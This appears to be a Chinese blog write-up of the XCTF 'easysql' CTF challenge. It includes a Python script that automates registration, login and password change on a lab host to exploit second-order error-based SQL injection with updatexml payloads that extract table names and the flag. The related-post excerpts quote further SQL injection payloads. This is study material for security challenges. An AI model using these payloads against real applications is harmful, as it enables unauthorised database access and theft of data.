XCTF easysql注入writeup

最新推荐文章于 2023-08-27 10:23:12 发布
最新推荐文章于 2023-08-27 10:23:12 发布
阅读量675 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/haodeshua/article/details/96135861
版权

我没有拿到flag,不过根据writeup的提示。。。还是没做出来。有朋友做出来了可以在下面评论。

官方提示如下

根据提示,我写了一个脚本,脚本代码如下,这个脚本可以在代码里修改用户名和密码,直接完成在网站上用户名和密码的创建和登录以及修改密码。

# -*-coding:utf-8-*-
import requests

#cookiesq全局变量不用改
url = "http://111.198.29.45:49818/"
#user='adminaa"||updatexml(1,concat(0x7e,(SELECT(GROUP_CONCAT(TABLE_NAME))FROM(information_schema.TABLES)WHERE(table_schema=database()))),0)#'
# a='SELECT(GROUP_CONCAT(TABLE_NAME))FROM(information_schema.TABLES)WHERE(table_schema=database())'
# flag='updatexml(1,concat(0x7e,),0)'
# flag='SELECT(flag)FROM(flag)'
#user='adminaa"||updatexml(1,concat(0x7e,(SELECT(GROUP_CONCAT(TABLE_NAME))FROM(information_schema.TABLES)WHERE(table_schema=database()))),0)#'
user='adminaa"||updatexml(1,concat(0x7e,(SELECT(flag)FROM(flag))),0)#'
passwd='updatexml(1,concat(0x7e,(SELECT(GROUP_CONCAT(TABLE_NAME))FROM(information_schema.TABLES)WHERE(table_schema=database()))),0)'
newpass='cc'
email="cc"
cookies=""
#用于表示账号密码是否修改成功
flag=0
usps=[]
def register(user,passwd,email):
    urlr=url+"register.php"
    r = requests.post(url=urlr,data={'username':user,'password':passwd,'email':email})
    # print r.content
    # print r.headers
    if 'user exists' not in r.content:
        usps.append({user,passwd})
        cookies=r.cookies
        print 'sucess create user '+ user +" passwd " + passwd
        print r.text
        return 0
    else:
        print 'fail create '+user
        print r.text
        return 1
def login(user,passwd):
    global cookies
    urll=url+"login.php"
    r = requests.post(url=urll,data={"username":user,"password":passwd},cookies=cookies)
    #print "login back "+r.text
    if user in r.text:
        print "user "+ user + " sucess login "
        print r.text
    else:
        print "user "+user+" login fail"
        print r.text
def changepw(oldpass,newpass):
    global cookies
    global flag
    urlc=url+"changepwd.php"
    headers={
        "Referer":"http://111.198.29.45:49818/changepwd.php"
    }
    r=requests.post(urlc,data={"oldpass":oldpass,"newpass":newpass},cookies=cookies)
    #print "changpw "+ r.text
    # cookies=r.cookies
    #print r.request.headers
    if "REGISTER" in r.text:
        print "fail create"
        print r.text
        flag = 0
    else:
        print "sucess change"
        print r.text
        flag = 1
    #print r.headers
if __name__=="__main__":
    # changepw(cookie=cookies)
    # if flag==0:
    #     #register(user,passwd,email)
    #     login(user,passwd)
    #     changepw(cookie=cookies)
    #     print flag
    #     print cookies
    r=requests.get('http://111.198.29.45:49818/')
    cookies=r.cookies
    # print cookies
    register(user,passwd,"cc")
    login(user,passwd)
    changepw(passwd,newpass)
    # print flag
    # r=requests.post('http://111.198.29.45:49818/changepwd.php')
    # print r.text
更加官方提示,我发现在用户名处存在着报错注入,输入如上,结果如下:

得到了官方提示一致的结果。

再继续,把user更改为adminaa"||updatexml(1,concat(0x7e,(SELECT(GROUP_CONCAT(TABLE_NAME))FROM(information_schema.TABLES)WHERE(table_schema=database()))),0)#

发现注册时返回dberror。根本注册不成功。

只要时含有WHERE的都是会报db error。得不到传说中的flag。

怀疑对where或者=过滤了,测试一下,没有,没有过滤。。。,不过对空格确实是有过滤。。。。

 

做到现在,这个db error不知道怎么回事,我自己现在也想不出来怎么绕过它。如果有大佬看到这篇文章,如能解答,感激不尽

tips:使用代码时,注意修改代码里的url,user,passwd等变量。这样就不用手动注册,登录,修改密码那么麻烦了。

 

小傅老师
关注
Xctf练习sql注入--supersqli
weixin_45694388的博客
12-28 298
三种方法 方法一 =1 回显正常 =1’回显不正常,报sql语法错误 =1’ --+ 回显正常,说明有sql注入点,应该是字符型注入(# 不能用) =1’ order by 3 --+ 回显失败,说明有2个注入点 =1’ union select 1,2 --+ 回显显示过滤语句: =1’; show databases --+ 爆数据库名 =-1’; show tables --+ 绕过过滤,显示表下的列名 =1’;show columns from words --+ 尝试堆叠
CTF [SUCTF 2019]EasySQL writeup 堆叠注入 | || *的使用
baynk的博客
04-01 2562
专挑注入的题先做。。。 0x01 干干干 给flag, 然后又试了',",-1等查找注入点的参数,发现存在整形注入,出现Nonono.都是被检测出来有过滤,于是去fuzz了下。 这些都是被过滤的,于是发现有个|和||没有被过滤,可以搞盲注,但是or被过滤了,information也连带着用不了,这玩意用不了常规的注入好像也没用,报错信息也关了,报错注入也用不了。于是又看前端的输出感觉像堆叠注...
xctf之very_easy_sql
qq_40646572的博客
10-11 2758
题目如上,既然这道题的名称就是sql,那么就是让我们找到sql注入点。题目下面介绍说是签到题,我信了,然后我人麻了。。。我以为签到题可能就是注入点直接给我们了,然而并不是,这是一道较为复杂的题,起码对我来说是的。这道题包含gopher协议结合ssrf漏洞的sql注入。首先,在页面上有两个输入框,进行尝试了下,发现不是注入点,然后我们看到请求返回包中,存在use.php提示,并且(后面我们发现此处存在一个大坑。)
实验吧-简单的sql注入 Writeup
baynk的博客
07-28 431
又弄了一个,虽然说不难,但是这个有点蛋疼- -,有些地方坑了好久。。。 过程 一开始就是简单的输入数值进行查询,加引号后发现有报错。 单引号闭合,试过了#和-- 都被过滤了,没法使用,所以试试自己闭合,这次是OK的。 回显点应该只有一个,就是name了,这里就不试order by 了。直接union select,但是union select好像都被过滤了。试了下双写,发现过滤的时候如果最后不是...
xctf----easyjni
qq_41071646的博客
01-22 1474
这个题 也不算是难题把 就是可能要静下心来好好的观察一下把 先看 一下反编译的结果 然后 这里调用了 Main 的 a方法 我们去看一下 这里 参数是经过com/a/easyjni/a 这个包里的 a 方法 然后跟进去 这不用说了 一看就知道了 是变形的base64 这里我们知道了 是我们输入的字符 经过变形的base64 加密 然后...
文件上传注入——【XCTF】upload writeup
Ve99tr’s Blog
10-04 1949
题目 题目名称为upload 进入页面,注册admin账号,登入admin账号,一切行如流水 来到了文件上传的页面 文件上传 尝试上传普通图片 ==>通过 这里通过测试发现,仅能上传后缀为jpg的文件,png等其他格式的图片文件均报错 尝试上传php一句话木马 ==>报错 尝试上传一句话图片马 ==>通过(但是并没有什么用,因为没有路径) 经过各种尝试,题目...
任意密码修改、XFF绕过及文件上传——【XCTF】bug writeup
Ve99tr’s Blog
10-03 1103
题目 XCTF攻防世界web题-bug 进入后为登入页面 注册账号 注册账号admin#并登录 点击Manage项,提示不是admin 看来需要admin账号登录 Findpwd 登出,并点击Findpwd(找回密码) 填写admin#账号信息 转到重置密码的界面 使用burpsuite抓包,修改admin#为admin,尝试修改admin的密码 因为前面的admin#信息已经绕过了检测,所...
XCTF Web2 writeup(php 代码逆向)
gonganDV的博客
07-22 1139
web2(php 逆向) <?php $miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; functionencode($str){ $_o=strrev($str); //echo$_o; for($_0=0;$_0<strlen($_o);$_...
XCTF-攻防世界-密码学crypto-新手练习区-writeup
热门推荐
Ryannn_的博客
10-23 1万+
目录 0x00 base64 0x01 Caesar 0x02 Morse 0x03 Railfence 0x04 转轮机加密 0x05 easy_RSA 0x06 Normal_RSA 0x07 不仅仅是Morse 0x08 混合编码 0x09 easychallenge 0x0A easy_ECC 0x0B 幂数加密 0x00 base64 元宵节灯谜是一种古老的传...
XCTF】 Web进阶区部分 WriteUp(一)
野原新之助
10-24 819
文章目录1、unserialize32、Web_php_unserialize3、supersqli(随便注)分析方法一:修改表结构方法二:预处理4、warmup5、web2 终于搭建了自己的网站,已经初具形态,之后大部分博文都会发布在自己的网站上,少量会同步在CSDN,小伙伴们可以去那里看我的一些学习分享呦???? (最近在申请备案,因此网站暂时无法访问……) 传送门:https://www.yyxzz.net 1、unserialize3 题目是一段php代码,是反序列化题目,需要将序列化结果通
XCTF2-web supersqli
orchid_sea的博客
11-28 561
使用 and 1=1判断注入点,存在单引号布尔注入。使用order by判断字段数,测试出来是2个字段。发现数据库supersqli,与题目对应。发现对 select|update|delete|drop|insert|where|./i都进行了正则匹配,存在两个表,words表和1919810931114514表,分别查看。words表中没有flag,数字表中存在flag字段。
xctf攻防世界easysql wp
sash1mi
02-20 1940
xctf攻防世界easysql wp 考察知识点: SQL注入 二次注入 python脚本 访问题目地址 有注册和登录两个功能 经测试发现该题目存在二次注入 https://www.jianshu.com/p/3fe7904683ac username:'k3vin"/ password:k3vin email:k3vin 注册成功后有一个修改密码的页面 修改密码,报如下错误 猜测并构造payload: 1"||extractvalue(1,concat(0x7e,(select(database
CTF每日练习之“ezsql“-regexp注入
最新发布
LCW991207的博客
08-27 463
CTF每日练习(8月29日) "ezsql"-regexp注入
XCTF-攻防世界CTF平台-Web类——14、supersqli(SQL注入、关键词过滤)
Onlyone_1314的博客
11-27 2084
目录标题方法一、堆叠注入1、rename修改表名和alter change修改列名2、rename修改表名和alter add添加列名方法二、handler语句方法三、预编译 打开题目地址 之后搜索:1’ or 1=1# 成功返回了3条数据,说明存在SQL注入漏洞 之后先判断有几列数据,使用order by 1让返回的数据按照第一列排序: 1' or 1=1 order by 1 # 返回了正确的结果,并且按照第一列排序了,说明至少存在一列数据。 其实我们也可以直接从order by 2让返回的数据
[GYCTF2020]Ezsqli(Mysql逐位比较)
D.MIND 的博客
04-23 615
前言 用到异或注入、bool盲注,这题我感觉最重要的还是理解mysql是如何比较字符串的 与利用 逐位比较 来配合盲注 文章目录前言`sys.schema_table_statistics_with_buffer`查表mysql字符串 逐位比较大小总结 这题关键过滤了union 、if 、sleep与 information,当然常规的or 和 and也是过滤了的 一开始看到 if 和sleep被过滤了就没有往延时注入、union注入上想 异或注入就成了我的首选! 测试一下 id=1 ^ 1# Error
ciscn2021-easy-sql无列名注入
soldi_er的博客
05-17 609
文章目录   登陆框。前端代码无信息。   部分黑名单字符:Union、Information、Sys、nno、column。   学到的东西: (1)Union的绕过,虽然比赛中绕不过去,但可以拓展绕过知识。 (2)查表的一些视图。 (3)无列名注入,通过表名可以查列名,无需union关键字。   前期报错注入,可以查到数据库名。 测试1:uname=1&passwd='。发现是MariaDB。 You have an error in your SQL syntax; check the ma
【CTF bugku 成绩查询】关于sql注入
zw05011的博客
01-17 667
知识点 sql注入基础原理(超详细) - 简书一、Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最...https://www.jianshu.com/p/078df7a35671通过1和1'查看返回值,确定注入 通过1' order by 1#、1' order by 2#直到确定为几列 通过联合查询 1' union select database(),user()#进行查询
sql server 字段密码解密_SQL注入漏洞测试
weixin_39927059的博客
12-07 1012
SQL注入漏洞测试 --Write Up题目用到的工具AES加密网站:http://tool.chacuo.net/cryptaesBASE64加密网站:https://www.sojson.com/base64.htmlMD5加密网站:https://www.cmd5.com/1.靶场https://www.mozhe.cn/bug/deta...
SQL注入漏洞详解
墨痕诉清风的博客
08-09 9379
" 预先编译好,也就是SQL引擎会预先进行语法分析,产生语法树,生成执行计划,也就是说,后面你输入的参数,无论你输入的是什么,都不会影响该SQL语句的语法结构了,因为语法分析已经完成了,而语法分析主要是分析SQL命令,比如 select、from 、where 、and、 or 、order by 等等。在这里,我们使用了占位符的方式,将该SQL传入prepare函数后,预处理函数就会得到本次查询语句的SQL模板类,并将这个模板类返回,模板可以防止传那些危险变量改变本身查询语句的语义。
XCTF高校防疫挑战赛:实战揭秘SQL注入技巧
在"XCTF高校战”疫”分享赛"中,讨论的核心主题是SQL注入漏洞的利用与防范。SQL注入是一种常见的Web应用程序安全威胁,当恶意用户能够通过输入恶意构造的SQL查询来操纵数据库服务器的行为时,就会发生这种攻击。在这...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值